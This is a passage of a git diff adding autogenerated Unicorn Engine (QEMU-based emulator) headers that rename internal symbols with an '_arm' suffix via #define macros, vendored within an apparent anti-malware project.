qmp_input_end_implicit_struct qmp_input_end_implicit_struct_arm +#define qmp_input_end_list qmp_input_end_list_arm +#define qmp_input_end_struct qmp_input_end_struct_arm +#define qmp_input_get_next_type qmp_input_get_next_type_arm +#define qmp_input_get_object qmp_input_get_object_arm +#define qmp_input_get_visitor qmp_input_get_visitor_arm +#define qmp_input_next_list qmp_input_next_list_arm +#define qmp_input_optional qmp_input_optional_arm +#define qmp_input_pop qmp_input_pop_arm +#define qmp_input_push qmp_input_push_arm +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_arm +#define qmp_input_start_list qmp_input_start_list_arm +#define qmp_input_start_struct qmp_input_start_struct_arm +#define qmp_input_type_bool qmp_input_type_bool_arm +#define qmp_input_type_int qmp_input_type_int_arm +#define qmp_input_type_number qmp_input_type_number_arm +#define qmp_input_type_str qmp_input_type_str_arm +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_arm +#define qmp_input_visitor_new qmp_input_visitor_new_arm +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_arm +#define qmp_output_add_obj qmp_output_add_obj_arm +#define qmp_output_end_list qmp_output_end_list_arm +#define qmp_output_end_struct qmp_output_end_struct_arm +#define qmp_output_first qmp_output_first_arm +#define qmp_output_get_qobject qmp_output_get_qobject_arm +#define qmp_output_get_visitor qmp_output_get_visitor_arm +#define qmp_output_last qmp_output_last_arm +#define qmp_output_next_list qmp_output_next_list_arm +#define qmp_output_pop qmp_output_pop_arm +#define qmp_output_push_obj qmp_output_push_obj_arm +#define qmp_output_start_list qmp_output_start_list_arm +#define qmp_output_start_struct qmp_output_start_struct_arm +#define qmp_output_type_bool qmp_output_type_bool_arm +#define qmp_output_type_int qmp_output_type_int_arm +#define qmp_output_type_number qmp_output_type_number_arm +#define qmp_output_type_str qmp_output_type_str_arm +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_arm +#define qmp_output_visitor_new qmp_output_visitor_new_arm +#define qobject_decref qobject_decref_arm +#define qobject_to_qbool qobject_to_qbool_arm +#define qobject_to_qdict qobject_to_qdict_arm +#define qobject_to_qfloat qobject_to_qfloat_arm +#define qobject_to_qint qobject_to_qint_arm +#define qobject_to_qlist qobject_to_qlist_arm +#define qobject_to_qstring qobject_to_qstring_arm +#define qobject_type qobject_type_arm +#define qstring_append qstring_append_arm +#define qstring_append_chr qstring_append_chr_arm +#define qstring_append_int qstring_append_int_arm +#define qstring_destroy_obj qstring_destroy_obj_arm +#define qstring_from_escaped_str qstring_from_escaped_str_arm +#define qstring_from_str qstring_from_str_arm +#define qstring_from_substr qstring_from_substr_arm +#define qstring_get_length qstring_get_length_arm +#define qstring_get_str qstring_get_str_arm +#define qstring_new qstring_new_arm +#define qstring_type qstring_type_arm +#define ram_block_add ram_block_add_arm +#define ram_size ram_size_arm +#define range_compare range_compare_arm +#define range_covers_byte range_covers_byte_arm +#define range_get_last range_get_last_arm +#define range_merge range_merge_arm +#define ranges_can_merge ranges_can_merge_arm +#define raw_read raw_read_arm +#define raw_write raw_write_arm +#define rcon rcon_arm +#define read_raw_cp_reg read_raw_cp_reg_arm +#define recip_estimate recip_estimate_arm +#define recip_sqrt_estimate recip_sqrt_estimate_arm +#define register_cp_regs_for_features register_cp_regs_for_features_arm +#define register_multipage register_multipage_arm +#define register_subpage register_subpage_arm +#define register_tm_clones register_tm_clones_arm +#define register_types_object register_types_object_arm +#define regnames regnames_arm +#define render_memory_region render_memory_region_arm +#define reset_all_temps reset_all_temps_arm +#define reset_temp reset_temp_arm +#define rol32 rol32_arm +#define rol64 rol64_arm +#define ror32 ror32_arm +#define ror64 ror64_arm +#define roundAndPackFloat128 roundAndPackFloat128_arm +#define roundAndPackFloat16 roundAndPackFloat16_arm +#define roundAndPackFloat32 roundAndPackFloat32_arm +#define roundAndPackFloat64 roundAndPackFloat64_arm +#define roundAndPackFloatx80 roundAndPackFloatx80_arm +#define roundAndPackInt32 roundAndPackInt32_arm +#define roundAndPackInt64 roundAndPackInt64_arm +#define roundAndPackUint64 roundAndPackUint64_arm +#define round_to_inf round_to_inf_arm +#define run_on_cpu run_on_cpu_arm +#define s0 s0_arm +#define S0 S0_arm +#define s1 s1_arm +#define S1 S1_arm +#define sa1100_initfn sa1100_initfn_arm +#define sa1110_initfn sa1110_initfn_arm +#define save_globals save_globals_arm +#define scr_write scr_write_arm +#define sctlr_write sctlr_write_arm +#define set_bit set_bit_arm +#define set_bits set_bits_arm +#define set_default_nan_mode set_default_nan_mode_arm +#define set_feature set_feature_arm +#define set_float_detect_tininess set_float_detect_tininess_arm +#define set_float_exception_flags set_float_exception_flags_arm +#define set_float_rounding_mode set_float_rounding_mode_arm +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_arm +#define set_flush_to_zero set_flush_to_zero_arm +#define set_swi_errno set_swi_errno_arm +#define sextract32 sextract32_arm +#define sextract64 sextract64_arm +#define shift128ExtraRightJamming shift128ExtraRightJamming_arm +#define shift128Right shift128Right_arm +#define shift128RightJamming shift128RightJamming_arm +#define shift32RightJamming shift32RightJamming_arm +#define shift64ExtraRightJamming shift64ExtraRightJamming_arm +#define shift64RightJamming shift64RightJamming_arm +#define shifter_out_im shifter_out_im_arm +#define shortShift128Left shortShift128Left_arm +#define shortShift192Left shortShift192Left_arm +#define simple_mpu_ap_bits simple_mpu_ap_bits_arm +#define size_code_gen_buffer size_code_gen_buffer_arm +#define softmmu_lock_user softmmu_lock_user_arm +#define softmmu_lock_user_string softmmu_lock_user_string_arm +#define softmmu_tget32 softmmu_tget32_arm +#define softmmu_tget8 softmmu_tget8_arm +#define softmmu_tput32 softmmu_tput32_arm +#define softmmu_unlock_user softmmu_unlock_user_arm +#define sort_constraints sort_constraints_arm +#define sp_el0_access sp_el0_access_arm +#define spsel_read spsel_read_arm +#define spsel_write spsel_write_arm +#define start_list start_list_arm +#define stb_p stb_p_arm +#define stb_phys stb_phys_arm +#define stl_be_p stl_be_p_arm +#define stl_be_phys stl_be_phys_arm +#define stl_he_p stl_he_p_arm +#define stl_le_p stl_le_p_arm +#define stl_le_phys stl_le_phys_arm +#define stl_phys stl_phys_arm +#define stl_phys_internal stl_phys_internal_arm +#define stl_phys_notdirty stl_phys_notdirty_arm +#define store_cpu_offset store_cpu_offset_arm +#define store_reg store_reg_arm +#define store_reg_bx store_reg_bx_arm +#define store_reg_from_load store_reg_from_load_arm +#define stq_be_p stq_be_p_arm +#define stq_be_phys stq_be_phys_arm +#define stq_he_p stq_he_p_arm +#define stq_le_p stq_le_p_arm +#define stq_le_phys stq_le_phys_arm +#define stq_phys stq_phys_arm +#define string_input_get_visitor string_input_get_visitor_arm +#define string_input_visitor_cleanup string_input_visitor_cleanup_arm +#define string_input_visitor_new string_input_visitor_new_arm +#define strongarm_cp_reginfo strongarm_cp_reginfo_arm +#define strstart strstart_arm +#define strtosz strtosz_arm +#define strtosz_suffix strtosz_suffix_arm +#define stw_be_p stw_be_p_arm +#define stw_be_phys stw_be_phys_arm +#define stw_he_p stw_he_p_arm +#define stw_le_p stw_le_p_arm +#define stw_le_phys stw_le_phys_arm +#define stw_phys stw_phys_arm +#define stw_phys_internal stw_phys_internal_arm +#define sub128 sub128_arm +#define sub16_sat sub16_sat_arm +#define sub16_usat sub16_usat_arm +#define sub192 sub192_arm +#define sub8_sat sub8_sat_arm +#define sub8_usat sub8_usat_arm +#define subFloat128Sigs subFloat128Sigs_arm +#define subFloat32Sigs subFloat32Sigs_arm +#define subFloat64Sigs subFloat64Sigs_arm +#define subFloatx80Sigs subFloatx80Sigs_arm +#define subpage_accepts subpage_accepts_arm +#define subpage_init subpage_init_arm +#define subpage_ops subpage_ops_arm +#define subpage_read subpage_read_arm +#define subpage_register subpage_register_arm +#define subpage_write subpage_write_arm +#define suffix_mul suffix_mul_arm +#define swap_commutative swap_commutative_arm +#define swap_commutative2 swap_commutative2_arm +#define switch_mode switch_mode_arm +#define switch_v7m_sp switch_v7m_sp_arm +#define syn_aa32_bkpt syn_aa32_bkpt_arm +#define syn_aa32_hvc syn_aa32_hvc_arm +#define syn_aa32_smc syn_aa32_smc_arm +#define syn_aa32_svc syn_aa32_svc_arm +#define syn_breakpoint syn_breakpoint_arm +#define sync_globals sync_globals_arm +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_arm +#define syn_cp14_rt_trap syn_cp14_rt_trap_arm +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_arm +#define syn_cp15_rt_trap syn_cp15_rt_trap_arm +#define syn_data_abort syn_data_abort_arm +#define syn_fp_access_trap syn_fp_access_trap_arm +#define syn_insn_abort syn_insn_abort_arm +#define syn_swstep syn_swstep_arm +#define syn_uncategorized syn_uncategorized_arm +#define syn_watchpoint syn_watchpoint_arm +#define syscall_err syscall_err_arm +#define system_bus_class_init system_bus_class_init_arm +#define system_bus_info system_bus_info_arm +#define t2ee_cp_reginfo t2ee_cp_reginfo_arm +#define table_logic_cc table_logic_cc_arm +#define target_parse_constraint target_parse_constraint_arm +#define target_words_bigendian target_words_bigendian_arm +#define tb_add_jump tb_add_jump_arm +#define tb_alloc tb_alloc_arm +#define tb_alloc_page tb_alloc_page_arm +#define tb_check_watchpoint tb_check_watchpoint_arm +#define tb_find_fast tb_find_fast_arm +#define tb_find_pc tb_find_pc_arm +#define tb_find_slow tb_find_slow_arm +#define tb_flush tb_flush_arm +#define tb_flush_jmp_cache tb_flush_jmp_cache_arm +#define tb_free tb_free_arm +#define tb_gen_code tb_gen_code_arm +#define tb_hash_remove tb_hash_remove_arm +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_arm +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_arm +#define tb_invalidate_phys_range tb_invalidate_phys_range_arm +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_arm +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_arm +#define tb_jmp_remove tb_jmp_remove_arm +#define tb_link_page tb_link_page_arm +#define tb_page_remove tb_page_remove_arm +#define tb_phys_hash_func tb_phys_hash_func_arm +#define tb_phys_invalidate tb_phys_invalidate_arm +#define tb_reset_jump tb_reset_jump_arm +#define tb_set_jmp_target tb_set_jmp_target_arm +#define tcg_accel_class_init tcg_accel_class_init_arm +#define tcg_accel_type tcg_accel_type_arm +#define tcg_add_param_i32 tcg_add_param_i32_arm +#define tcg_add_param_i64 tcg_add_param_i64_arm +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_arm +#define tcg_allowed tcg_allowed_arm +#define tcg_canonicalize_memop tcg_canonicalize_memop_arm +#define tcg_commit tcg_commit_arm +#define tcg_cond_to_jcc tcg_cond_to_jcc_arm +#define tcg_constant_folding tcg_constant_folding_arm +#define tcg_const_i32 tcg_const_i32_arm +#define tcg_const_i64 tcg_const_i64_arm +#define tcg_const_local_i32 tcg_const_local_i32_arm +#define tcg_const_local_i64 tcg_const_local_i64_arm +#define tcg_context_init tcg_context_init_arm +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_arm +#define tcg_cpu_exec tcg_cpu_exec_arm +#define tcg_current_code_size tcg_current_code_size_arm +#define tcg_dump_info tcg_dump_info_arm +#define tcg_dump_ops tcg_dump_ops_arm +#define tcg_exec_all tcg_exec_all_arm +#define tcg_find_helper tcg_find_helper_arm +#define tcg_func_start tcg_func_start_arm +#define tcg_gen_abs_i32 tcg_gen_abs_i32_arm +#define tcg_gen_add2_i32 tcg_gen_add2_i32_arm +#define tcg_gen_add_i32 tcg_gen_add_i32_arm +#define tcg_gen_add_i64 tcg_gen_add_i64_arm +#define tcg_gen_addi_i32 tcg_gen_addi_i32_arm +#define tcg_gen_addi_i64 tcg_gen_addi_i64_arm +#define tcg_gen_andc_i32 tcg_gen_andc_i32_arm +#define tcg_gen_and_i32 tcg_gen_and_i32_arm +#define tcg_gen_and_i64 tcg_gen_and_i64_arm +#define tcg_gen_andi_i32 tcg_gen_andi_i32_arm +#define tcg_gen_andi_i64 tcg_gen_andi_i64_arm +#define tcg_gen_br tcg_gen_br_arm +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_arm +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_arm +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_arm +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_arm +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_arm +#define tcg_gen_callN tcg_gen_callN_arm +#define tcg_gen_code tcg_gen_code_arm +#define tcg_gen_code_common tcg_gen_code_common_arm +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_arm +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_arm +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_arm +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_arm +#define tcg_gen_exit_tb tcg_gen_exit_tb_arm +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_arm +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_arm +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_arm +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_arm +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_arm +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_arm +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_arm +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_arm +#define tcg_gen_goto_tb tcg_gen_goto_tb_arm +#define tcg_gen_ld_i32 tcg_gen_ld_i32_arm +#define tcg_gen_ld_i64 tcg_gen_ld_i64_arm +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_arm +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_arm +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_arm +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_arm +#define tcg_gen_mov_i32 tcg_gen_mov_i32_arm +#define tcg_gen_mov_i64 tcg_gen_mov_i64_arm +#define tcg_gen_movi_i32 tcg_gen_movi_i32_arm +#define tcg_gen_movi_i64 tcg_gen_movi_i64_arm +#define tcg_gen_mul_i32 tcg_gen_mul_i32_arm +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_arm +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_arm +#define tcg_gen_neg_i32 tcg_gen_neg_i32_arm +#define tcg_gen_neg_i64 tcg_gen_neg_i64_arm +#define tcg_gen_not_i32 tcg_gen_not_i32_arm +#define tcg_gen_op0 tcg_gen_op0_arm +#define tcg_gen_op1i tcg_gen_op1i_arm +#define tcg_gen_op2_i32 tcg_gen_op2_i32_arm +#define tcg_gen_op2_i64 tcg_gen_op2_i64_arm +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_arm +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_arm +#define tcg_gen_op3_i32 tcg_gen_op3_i32_arm +#define tcg_gen_op3_i64 tcg_gen_op3_i64_arm +#define tcg_gen_op4_i32 tcg_gen_op4_i32_arm +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_arm +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_arm +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_arm +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_arm +#define tcg_gen_op6_i32 tcg_gen_op6_i32_arm +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_arm +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_arm +#define tcg_gen_orc_i32 tcg_gen_orc_i32_arm +#define tcg_gen_or_i32 tcg_gen_or_i32_arm +#define tcg_gen_or_i64 tcg_gen_or_i64_arm +#define tcg_gen_ori_i32 tcg_gen_ori_i32_arm +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_arm +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_arm +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_arm +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_arm +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_arm +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_arm +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_arm +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_arm +#define tcg_gen_sar_i32 tcg_gen_sar_i32_arm +#define tcg_gen_sari_i32 tcg_gen_sari_i32_arm +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_arm +#define tcg_gen_shl_i32 tcg_gen_shl_i32_arm +#define tcg_gen_shl_i64 tcg_gen_shl_i64_arm +#define tcg_gen_shli_i32 tcg_gen_shli_i32_arm +#define tcg_gen_shli_i64 tcg_gen_shli_i64_arm +#define tcg_gen_shr_i32 tcg_gen_shr_i32_arm +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_arm +#define tcg_gen_shr_i64 tcg_gen_shr_i64_arm +#define tcg_gen_shri_i32 tcg_gen_shri_i32_arm +#define tcg_gen_shri_i64 tcg_gen_shri_i64_arm +#define tcg_gen_st_i32 tcg_gen_st_i32_arm +#define tcg_gen_st_i64 tcg_gen_st_i64_arm +#define tcg_gen_sub_i32 tcg_gen_sub_i32_arm +#define tcg_gen_sub_i64 tcg_gen_sub_i64_arm +#define tcg_gen_subi_i32 tcg_gen_subi_i32_arm +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_arm +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_arm +#define tcg_gen_xor_i32 tcg_gen_xor_i32_arm +#define tcg_gen_xor_i64 tcg_gen_xor_i64_arm +#define tcg_gen_xori_i32 tcg_gen_xori_i32_arm +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_arm +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_arm +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_arm +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_arm +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_arm +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_arm +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_arm +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_arm +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_arm +#define tcg_handle_interrupt tcg_handle_interrupt_arm +#define tcg_init tcg_init_arm +#define tcg_invert_cond tcg_invert_cond_arm +#define tcg_la_bb_end tcg_la_bb_end_arm +#define tcg_la_br_end tcg_la_br_end_arm +#define tcg_la_func_end tcg_la_func_end_arm +#define tcg_liveness_analysis tcg_liveness_analysis_arm +#define tcg_malloc tcg_malloc_arm +#define tcg_malloc_internal tcg_malloc_internal_arm +#define tcg_op_defs_org tcg_op_defs_org_arm +#define tcg_opt_gen_mov tcg_opt_gen_mov_arm +#define tcg_opt_gen_movi tcg_opt_gen_movi_arm +#define tcg_optimize tcg_optimize_arm +#define tcg_out16 tcg_out16_arm +#define tcg_out32 tcg_out32_arm +#define tcg_out64 tcg_out64_arm +#define tcg_out8 tcg_out8_arm +#define tcg_out_addi tcg_out_addi_arm +#define tcg_out_branch tcg_out_branch_arm +#define tcg_out_brcond32 tcg_out_brcond32_arm +#define tcg_out_brcond64 tcg_out_brcond64_arm +#define tcg_out_bswap32 tcg_out_bswap32_arm +#define tcg_out_bswap64 tcg_out_bswap64_arm +#define tcg_out_call tcg_out_call_arm +#define tcg_out_cmp tcg_out_cmp_arm +#define tcg_out_ext16s tcg_out_ext16s_arm +#define tcg_out_ext16u tcg_out_ext16u_arm +#define tcg_out_ext32s tcg_out_ext32s_arm +#define tcg_out_ext32u tcg_out_ext32u_arm +#define tcg_out_ext8s tcg_out_ext8s_arm +#define tcg_out_ext8u tcg_out_ext8u_arm +#define tcg_out_jmp tcg_out_jmp_arm +#define tcg_out_jxx tcg_out_jxx_arm +#define tcg_out_label tcg_out_label_arm +#define tcg_out_ld tcg_out_ld_arm +#define tcg_out_modrm tcg_out_modrm_arm +#define tcg_out_modrm_offset tcg_out_modrm_offset_arm +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_arm +#define tcg_out_mov tcg_out_mov_arm +#define tcg_out_movcond32 tcg_out_movcond32_arm +#define tcg_out_movcond64 tcg_out_movcond64_arm +#define tcg_out_movi tcg_out_movi_arm +#define tcg_out_op tcg_out_op_arm +#define tcg_out_pop tcg_out_pop_arm +#define tcg_out_push tcg_out_push_arm +#define tcg_out_qemu_ld tcg_out_qemu_ld_arm +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_arm +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_arm +#define tcg_out_qemu_st tcg_out_qemu_st_arm +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_arm +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_arm +#define tcg_out_reloc tcg_out_reloc_arm +#define tcg_out_rolw_8 tcg_out_rolw_8_arm +#define tcg_out_setcond32 tcg_out_setcond32_arm +#define tcg_out_setcond64 tcg_out_setcond64_arm +#define tcg_out_shifti tcg_out_shifti_arm +#define tcg_out_st tcg_out_st_arm +#define tcg_out_tb_finalize tcg_out_tb_finalize_arm +#define tcg_out_tb_init tcg_out_tb_init_arm +#define tcg_out_tlb_load tcg_out_tlb_load_arm +#define tcg_out_vex_modrm tcg_out_vex_modrm_arm +#define tcg_patch32 tcg_patch32_arm +#define tcg_patch8 tcg_patch8_arm +#define tcg_pcrel_diff tcg_pcrel_diff_arm +#define tcg_pool_reset tcg_pool_reset_arm +#define tcg_prologue_init tcg_prologue_init_arm +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_arm +#define tcg_reg_alloc tcg_reg_alloc_arm +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_arm +#define tcg_reg_alloc_call tcg_reg_alloc_call_arm +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_arm +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_arm +#define tcg_reg_alloc_op tcg_reg_alloc_op_arm +#define tcg_reg_alloc_start tcg_reg_alloc_start_arm +#define tcg_reg_free tcg_reg_free_arm +#define tcg_reg_sync tcg_reg_sync_arm +#define tcg_set_frame tcg_set_frame_arm +#define tcg_set_nop tcg_set_nop_arm +#define tcg_swap_cond tcg_swap_cond_arm +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_arm +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_arm +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_arm +#define tcg_target_const_match tcg_target_const_match_arm +#define tcg_target_init tcg_target_init_arm +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_arm +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_arm +#define tcg_temp_alloc tcg_temp_alloc_arm +#define tcg_temp_free_i32 tcg_temp_free_i32_arm +#define tcg_temp_free_i64 tcg_temp_free_i64_arm +#define tcg_temp_free_internal tcg_temp_free_internal_arm +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_arm +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_arm +#define tcg_temp_new_i32 tcg_temp_new_i32_arm +#define tcg_temp_new_i64 tcg_temp_new_i64_arm +#define tcg_temp_new_internal tcg_temp_new_internal_arm +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_arm +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_arm +#define tdb_hash tdb_hash_arm +#define teecr_write teecr_write_arm +#define teehbr_access teehbr_access_arm +#define temp_allocate_frame temp_allocate_frame_arm +#define temp_dead temp_dead_arm +#define temps_are_copies temps_are_copies_arm +#define temp_save temp_save_arm +#define temp_sync temp_sync_arm +#define tgen_arithi tgen_arithi_arm +#define tgen_arithr tgen_arithr_arm +#define thumb2_logic_op thumb2_logic_op_arm +#define ti925t_initfn ti925t_initfn_arm +#define tlb_add_large_page tlb_add_large_page_arm +#define tlb_flush_entry tlb_flush_entry_arm +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_arm +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_arm +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_arm +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_arm +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_arm +#define tlbi_aa64_va_write tlbi_aa64_va_write_arm +#define tlbiall_is_write tlbiall_is_write_arm +#define tlbiall_write tlbiall_write_arm +#define tlbiasid_is_write tlbiasid_is_write_arm +#define tlbiasid_write tlbiasid_write_arm +#define tlbimvaa_is_write tlbimvaa_is_write_arm +#define tlbimvaa_write tlbimvaa_write_arm +#define tlbimva_is_write tlbimva_is_write_arm +#define tlbimva_write tlbimva_write_arm +#define tlb_is_dirty_ram tlb_is_dirty_ram_arm +#define tlb_protect_code tlb_protect_code_arm +#define tlb_reset_dirty_range tlb_reset_dirty_range_arm +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_arm +#define tlb_set_dirty tlb_set_dirty_arm +#define tlb_set_dirty1 tlb_set_dirty1_arm +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_arm +#define tlb_vaddr_to_host tlb_vaddr_to_host_arm +#define token_get_type token_get_type_arm +#define token_get_value token_get_value_arm +#define token_is_escape token_is_escape_arm +#define token_is_keyword token_is_keyword_arm +#define token_is_operator token_is_operator_arm +#define tokens_append_from_iter tokens_append_from_iter_arm +#define to_qiv to_qiv_arm +#define to_qov to_qov_arm +#define tosa_init tosa_init_arm +#define tosa_machine_init tosa_machine_init_arm +#define tswap32 tswap32_arm +#define tswap64 tswap64_arm +#define type_class_get_size type_class_get_size_arm +#define type_get_by_name type_get_by_name_arm +#define type_get_parent type_get_parent_arm +#define type_has_parent type_has_parent_arm +#define type_initialize type_initialize_arm +#define type_initialize_interface type_initialize_interface_arm +#define type_is_ancestor type_is_ancestor_arm +#define type_new type_new_arm +#define type_object_get_size type_object_get_size_arm +#define type_register_internal type_register_internal_arm +#define type_table_add type_table_add_arm +#define type_table_get type_table_get_arm +#define type_table_lookup type_table_lookup_arm +#define uint16_to_float32 uint16_to_float32_arm +#define uint16_to_float64 uint16_to_float64_arm +#define uint32_to_float32 uint32_to_float32_arm +#define uint32_to_float64 uint32_to_float64_arm +#define uint64_to_float128 uint64_to_float128_arm +#define uint64_to_float32 uint64_to_float32_arm +#define uint64_to_float64 uint64_to_float64_arm +#define unassigned_io_ops unassigned_io_ops_arm +#define unassigned_io_read unassigned_io_read_arm +#define unassigned_io_write unassigned_io_write_arm +#define unassigned_mem_accepts unassigned_mem_accepts_arm +#define unassigned_mem_ops unassigned_mem_ops_arm +#define unassigned_mem_read unassigned_mem_read_arm +#define unassigned_mem_write unassigned_mem_write_arm +#define update_spsel update_spsel_arm +#define v6_cp_reginfo v6_cp_reginfo_arm +#define v6k_cp_reginfo v6k_cp_reginfo_arm +#define v7_cp_reginfo v7_cp_reginfo_arm +#define v7mp_cp_reginfo v7mp_cp_reginfo_arm +#define v7m_pop v7m_pop_arm +#define v7m_push v7m_push_arm +#define v8_cp_reginfo v8_cp_reginfo_arm +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_arm +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_arm +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_arm +#define vapa_cp_reginfo vapa_cp_reginfo_arm +#define vbar_write vbar_write_arm +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_arm +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_arm +#define vfp_get_fpcr vfp_get_fpcr_arm +#define vfp_get_fpscr vfp_get_fpscr_arm +#define vfp_get_fpsr vfp_get_fpsr_arm +#define vfp_reg_offset vfp_reg_offset_arm +#define vfp_set_fpcr vfp_set_fpcr_arm +#define vfp_set_fpscr vfp_set_fpscr_arm +#define vfp_set_fpsr vfp_set_fpsr_arm +#define visit_end_implicit_struct visit_end_implicit_struct_arm +#define visit_end_list visit_end_list_arm +#define visit_end_struct visit_end_struct_arm +#define visit_end_union visit_end_union_arm +#define visit_get_next_type visit_get_next_type_arm +#define visit_next_list visit_next_list_arm +#define visit_optional visit_optional_arm +#define visit_start_implicit_struct visit_start_implicit_struct_arm +#define visit_start_list visit_start_list_arm +#define visit_start_struct visit_start_struct_arm +#define visit_start_union visit_start_union_arm +#define vmsa_cp_reginfo vmsa_cp_reginfo_arm +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_arm +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_arm +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_arm +#define vmsa_ttbcr_write vmsa_ttbcr_write_arm +#define vmsa_ttbr_write vmsa_ttbr_write_arm +#define write_cpustate_to_list write_cpustate_to_list_arm +#define write_list_to_cpustate write_list_to_cpustate_arm +#define write_raw_cp_reg write_raw_cp_reg_arm +#define X86CPURegister32_lookup X86CPURegister32_lookup_arm +#define x86_op_defs x86_op_defs_arm +#define xpsr_read xpsr_read_arm +#define xpsr_write xpsr_write_arm +#define xscale_cpar_write xscale_cpar_write_arm +#define xscale_cp_reginfo xscale_cp_reginfo_arm +#define ARM_REGS_STORAGE_SIZE ARM_REGS_STORAGE_SIZE_arm +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/armeb.h b/ai_anti_malware/unicorn/unicorn-master/qemu/armeb.h new file mode 100644 index 0000000..30b771b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/armeb.h @@ -0,0 +1,3021 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_ARMEB_H +#define UNICORN_AUTOGEN_ARMEB_H +#define arm_release arm_release_armeb +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_armeb +#define 